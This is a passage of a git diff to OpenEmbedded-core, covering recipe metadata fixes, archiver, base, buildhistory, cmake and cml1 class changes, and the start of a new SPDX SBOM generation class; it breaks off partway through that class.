-http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
+https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
for guidelines on how to submit patches.
Mailing list:
- http://lists.openembedded.org/mailman/listinfo/openembedded-core
+ https://lists.openembedded.org/g/openembedded-core
Source code:
- http://git.openembedded.org/openembedded-core/
+ https://git.openembedded.org/openembedded-core/
diff --git a/meta-selftest/lib/pseudo_pyc_test1.py b/meta-selftest/lib/pseudo_pyc_test1.py
new file mode 100644
index 0000000000..b59abdd536
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test1.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test1"
diff --git a/meta-selftest/lib/pseudo_pyc_test2.py b/meta-selftest/lib/pseudo_pyc_test2.py
new file mode 100644
index 0000000000..fb67a978e0
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test2.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test2"
diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
SUMMARY = "GNU Aspell spell-checker"
SECTION = "console/utils"
+HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
SUMMARY = "An image used during oe-selftest tests"
-IMAGE_INSTALL = "packagegroup-core-boot dropbear"
+IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
IMAGE_FEATURES = "debug-tweaks"
IMAGE_LINGUAS = " "
diff --git a/meta-selftest/recipes-test/images/wic-image-minimal.bb b/meta-selftest/recipes-test/images/wic-image-minimal.bb
index e1da203b59..1cb019898d 100644
--- a/meta-selftest/recipes-test/images/wic-image-minimal.bb
+++ b/meta-selftest/recipes-test/images/wic-image-minimal.bb
@@ -6,7 +6,10 @@ IMAGE_INSTALL = "packagegroup-core-boot"
IMAGE_FSTYPES = "wic"
-WKS_FILE_DEPENDS = "syslinux syslinux-native dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS = "dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS_append_x86 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-64 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-x32 = " syslinux-native syslinux"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
new file mode 100644
index 0000000000..12dc91a8f3
--- /dev/null
+++ b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
@@ -0,0 +1,15 @@
+SUMMARY = "pseudo env test"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+python do_compile() {
+ import pseudo_pyc_test1
+ print(pseudo_pyc_test1.STRING)
+}
+
+python do_install() {
+ import pseudo_pyc_test2
+ print(pseudo_pyc_test2.STRING)
+}
diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
require recipeutils-test.inc
-LICENSE = "Proprietary"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
DEPENDS += "zlib"
diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
+DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Example of how to build an external Linux kernel module"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
+SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
# linux-yocto-custom.bb:
#
-# An example kernel recipe that uses the linux-yocto and oe-core
# kernel classes to apply a subset of yocto kernel management to git
# managed kernel repositories.
#
diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
-#
-# An example of a multilib image
+SUMMARY = "An example of a multilib image"
#
# This example includes a lib32 version of bash into an otherwise standard
# sato image. It assumes a "lib32" multilib has been enabled in the user's
diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "The canonical example of init scripts"
SECTION = "base"
+DESCRIPTION = "This recipe is a canonical example of init scripts"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 1a3c190604..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -53,10 +53,11 @@ ARCHIVER_MODE[recipe] ?= "0"
ARCHIVER_MODE[mirror] ?= "split"
DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
-ARCHIVER_TOPDIR ?= "${WORKDIR}/deploy-sources"
-ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
+ARCHIVER_ARCH = "${TARGET_SYS}"
+ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
-ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
# When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
return
+ # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
+ if pn.startswith('gcc-source'):
+ d.setVar('ARCHIVER_ARCH', "allarch")
+
def hasTask(task):
return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
@@ -281,7 +286,10 @@ python do_ar_configured() {
# ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
# do_configure, we archive the already configured ${S} to
# instead of.
- elif pn != 'libtool-native':
+ # The kernel class functions require the source to be in work-shared, so
+ # we don't unpack, patch or configure again; just archive the already
+ # configured ${S}.
+ elif not (pn == 'libtool-native' or is_work_shared(d)):
def runTask(task):
prefuncs = d.getVarFlag(task, 'prefuncs') or ''
for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
src_orig = '%s.orig' % src
oe.path.copytree(src, src_orig)
+ if bb.data.inherits_class('dos2unix', d):
+ bb.build.exec_func('do_convert_crlf_to_lf', d)
+
# Make sure gcc and kernel sources are patched only once
if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
SSTATETASKS += "do_deploy_archives"
do_deploy_archives () {
- echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
+ bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
}
python do_deploy_archives_setscene () {
sstate_setscene(d)
@@ -591,6 +602,7 @@ addtask do_dumpdata
addtask do_ar_recipe
addtask do_deploy_archives
do_build[recrdeptask] += "do_deploy_archives"
+do_rootfs[recrdeptask] += "do_deploy_archives"
do_populate_sdk[recrdeptask] += "do_deploy_archives"
python () {
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 7aa2e144eb..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
tools = d.getVar(toolsvar).split()
origbbenv = d.getVar("BB_ORIGENV", False)
path = origbbenv.getVar("PATH")
+ # Need to ignore our own scripts directories to avoid circular links
+ for p in path.split(":"):
+ if p.endswith("/scripts"):
+ path = path.replace(p, "/ignoreme")
bb.utils.mkdirhier(dest)
notfound = []
for tool in tools:
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
# /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
# would return /usr/local/bin/ccache/gcc, but what we need is
# /usr/bin/gcc, this code can check and fix that.
- if "ccache" in srctool:
+ if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
srctool = bb.utils.which(path, tool, executable=True, direction=1)
if srctool:
os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
python base_do_fetch() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.download()
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
python base_do_unpack() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.unpack(d.getVar('WORKDIR'))
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
def get_layers_branch_rev(d):
@@ -231,6 +235,7 @@ python base_eventhandler() {
if isinstance(e, bb.event.ConfigParsed):
if not d.getVar("NATIVELSBSTRING", False):
d.setVar("NATIVELSBSTRING", lsb_distro_identifier(d))
+ d.setVar("ORIGNATIVELSBSTRING", d.getVar("NATIVELSBSTRING", False))
d.setVar('BB_VERSION', bb.__version__)
# There might be no bb.event.ConfigParsed event if bitbake server is
@@ -388,6 +393,11 @@ python () {
oe.utils.features_backfill("DISTRO_FEATURES", d)
oe.utils.features_backfill("MACHINE_FEATURES", d)
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("S")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${S}")
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("B")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${B}")
+
# Handle PACKAGECONFIG
#
# These take the form:
@@ -682,7 +692,7 @@ python () {
if os.path.basename(p) == machine and os.path.isdir(p):
paths.append(p)
- if len(paths) != 0:
+ if paths:
for s in srcuri.split():
if not s.startswith("file://"):
continue
@@ -715,7 +725,7 @@ do_cleansstate[nostamp] = "1"
python do_cleanall() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
fi
cd ${S}
+ install -d ${D}${base_prefix}
tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
- | tar --no-same-owner -xpf - -C ${D}
+ | tar --no-same-owner -xpf - -C ${D}${base_prefix}
}
FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 156324d339..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
+POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
+POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
+SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
python buildhistory_write_sigs() {
if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -852,7 +855,7 @@ END
}
python buildhistory_eventhandler() {
- if e.data.getVar('BUILDHISTORY_FEATURES').strip():
+ if (e.data.getVar('BUILDHISTORY_FEATURES') or "").strip():
reset = e.data.getVar("BUILDHISTORY_RESET")
olddir = e.data.getVar("BUILDHISTORY_OLD_DIR")
if isinstance(e, bb.event.BuildStarted):
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
if os.path.isdir(olddir):
shutil.rmtree(olddir)
rootdir = e.data.getVar("BUILDHISTORY_DIR")
+ bb.utils.mkdirhier(rootdir)
entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
bb.utils.mkdirhier(olddir)
for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
value = value.replace('"', '').strip()
old_tag_srcrevs[key] = value
with open(srcrevfile, 'w') as f:
- orig_srcrev = d.getVar('SRCREV', False) or 'INVALID'
- if orig_srcrev != 'INVALID':
- f.write('# SRCREV = "%s"\n' % orig_srcrev)
- if len(srcrevs) > 1:
- for name, srcrev in sorted(srcrevs.items()):
- orig_srcrev = d.getVar('SRCREV_%s' % name, False)
- if orig_srcrev:
- f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev))
- f.write('SRCREV_%s = "%s"\n' % (name, srcrev))
- else:
- f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values())))
- if len(tag_srcrevs) > 0:
- for name, srcrev in sorted(tag_srcrevs.items()):
- f.write('# tag_%s = "%s"\n' % (name, srcrev))
- if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
- pkg = d.getVar('PN')
- bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
+ for name, srcrev in sorted(srcrevs.items()):
+ suffix = "_" + name
+ if name == "default":
+ suffix = ""
+ orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
+ if orig_srcrev:
+ f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
+ f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
+ for name, srcrev in sorted(tag_srcrevs.items()):
+ f.write('# tag_%s = "%s"\n' % (name, srcrev))
+ if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
+ pkg = d.getVar('PN')
+ bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
else:
if os.path.exists(srcrevfile):
diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
-set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" )
+find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
+
set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
except OSError:
mtime = 0
+ # set up native pkg-config variables (kconfig scripts call pkg-config directly, so it cannot generically be overridden to pkg-config-native)
+ d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+ d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+ d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+ d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+ # ensure that environment variables are overwritten with this task's 'd' values
+ d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
d.getVar('PN') + ' Configuration', d)
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
+
+# The product name that the CVE database uses. Defaults to BPN, but may need to
+# be overridden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
+CVE_PRODUCT ??= "${BPN}"
+CVE_VERSION ??= "${PV}"
+
+SPDXDIR ??= "${WORKDIR}/spdx"
+SPDXDEPLOY = "${SPDXDIR}/deploy"
+SPDXWORK = "${SPDXDIR}/work"
+SPDXIMAGEWORK = "${SPDXDIR}/image-work"
+SPDXSDKWORK = "${SPDXDIR}/sdk-work"
+
+SPDX_TOOL_NAME ??= "oe-spdx-creator"
+SPDX_TOOL_VERSION ??= "1.0"
+
+SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
+
+SPDX_INCLUDE_SOURCES ??= "0"
+SPDX_ARCHIVE_SOURCES ??= "0"
+SPDX_ARCHIVE_PACKAGED ??= "0"
+
+SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
+SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
+SPDX_PRETTY ??= "0"
+
+SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
+
+SPDX_CUSTOM_ANNOTATION_VARS ??= ""
+
+SPDX_ORG ??= "OpenEmbedded ()"
+SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
+SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
+ this recipe. For SPDX documents created using this class during the build, this \
+ is the contact information for the person or organization who is doing the \
+ build."
+
+def extract_licenses(filename):
+ import re
+
+ lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
+
+ try:
+ with open(filename, 'rb') as f:
+ size = min(15000, os.stat(filename).st_size)
+ txt = f.read(size)
+ licenses = re.findall(lic_regex, txt)
+ if licenses:
+ ascii_licenses = [lic.decode('ascii') for lic in licenses]
+ return ascii_licenses
+ except Exception as e:
+ bb.warn(f"Exception reading {filename}: {e}")
+ return None
+
+def get_doc_namespace(d, doc):
+ import uuid
+ namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
+ return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
+
+def create_annotation(d, comment):
+ from datetime import datetime, timezone
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ annotation = oe.spdx.SPDXAnnotation()
+ annotation.annotationDate = creation_time
+ annotation.annotationType = "OTHER"
+ annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
+ annotation.comment = comment
+ return annotation
+
+def recipe_spdx_is_native(d, recipe):
+ return any(a.annotationType == "OTHER" and
+ a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
+ a.comment == "isNative" for a in recipe.annotations)
+
+def is_work_shared_spdx(d):
+ return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
+
+def get_json_indent(d):
+ if d.getVar("SPDX_PRETTY") == "1":
+ return 2
+ return None
+
+python() {
+ import json
+ if d.getVar("SPDX_LICENSE_DATA"):
+ return
+
+ with open(d.getVar("SPDX_LICENSES"), "r") as f:
+ data = json.load(f)
+ # Transform the license array to a dictionary
+ data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
+ d.setVar("SPDX_LICENSE_DATA", data)
+}
+
+def convert_license_to_spdx(lic, document, d, existing={}):
+ from pathlib import Path
+ import oe.spdx
+
+ license_data = d.getVar("SPDX_LICENSE_DATA")
+ extracted = {}
+
+ def add_extracted_license(ident, name):
+ nonlocal document
+
+ if name in extracted:
+ return
+
+ extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
+ extracted_info.name = name
+ extracted_info.licenseId = ident
+ extracted_info.extractedText = None
+
+ if name == "PD":
+ # Special-case this.
+ extracted_info.extractedText = "Software released to the public domain"
+ else:
+ # Search for the license in COMMON_LICENSE_DIR and LICENSE_PATH
+ for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
+ try:
+ with (Path(directory) / name).open(errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ break
+ except FileNotFoundError:
+ pass
+ if extracted_info.extractedText is None:
+ # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
+ filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
+ if filename:
+ filename = d.expand("${S}/" + filename)
+ with open(filename, errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ else:
+ bb.error("Cannot find any text for license %s" % name)
+
+ extracted[name] = extracted_info
+ document.hasExtractedLicensingInfos.append(extracted_info)
+
+ def convert(l):
+ if l == "(" or l == ")":
+ return l
+
+ if l == "&":
+ return "AND"
+
+ if l == "|":
+ return "OR"
+
+ if l == "CLOSED":
+ return "NONE"
+
+ spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
+ if spdx_license in license_data["licenses"]:
+ return spdx_license
+
+ try:
+ spdx_license = existing[l]
+ except KeyError:
+ spdx_license = "LicenseRef-" + l
+ add_extracted_license(spdx_license, l)
+
+ return spdx_license
+
+ lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
+
+ return ' '.join(convert(l) for l in lic_split)
+
+def process_sources(d):
+ pn = d.getVar('PN')
+ assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
+ if pn in assume_provided:
+ for p in d.getVar("PROVIDES").split():
+ if p != pn:
+ pn = p
+ break
+
+ # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
+ # so avoid archiving source here.
+ if pn.startswith('glibc-locale'):
+ return False
+ if d.getVar('PN') == "libtool-cross":
+ return False
+ if d.getVar('PN') == "libgcc-initial":
+ return False
+ if d.getVar('PN') == "shadow-sysroot":
+ return False
+
+ # We just archive gcc-source for all the gcc related recipes
+ if d.getVar('BPN') in ['gcc', 'libgcc']:
+ bb.debug(1, 'spdx: There is a bug in the scan of %s, do nothing' % pn)
+ return False
+
+ return True
+
+
+def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
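+ # Create an SPDXFile entry (with SHA1 and SHA256 checksums, and an
+ # SPDX-License-Identifier scan for source files) for every regular,
+ # non-symlink file under topdir, optionally add each file to the given
+ # tar archive, and derive the package verification code from the sorted
+ # per-file SHA1s.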
+ from pathlib import Path
+ import oe.spdx
+ import hashlib
+
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+ if source_date_epoch:
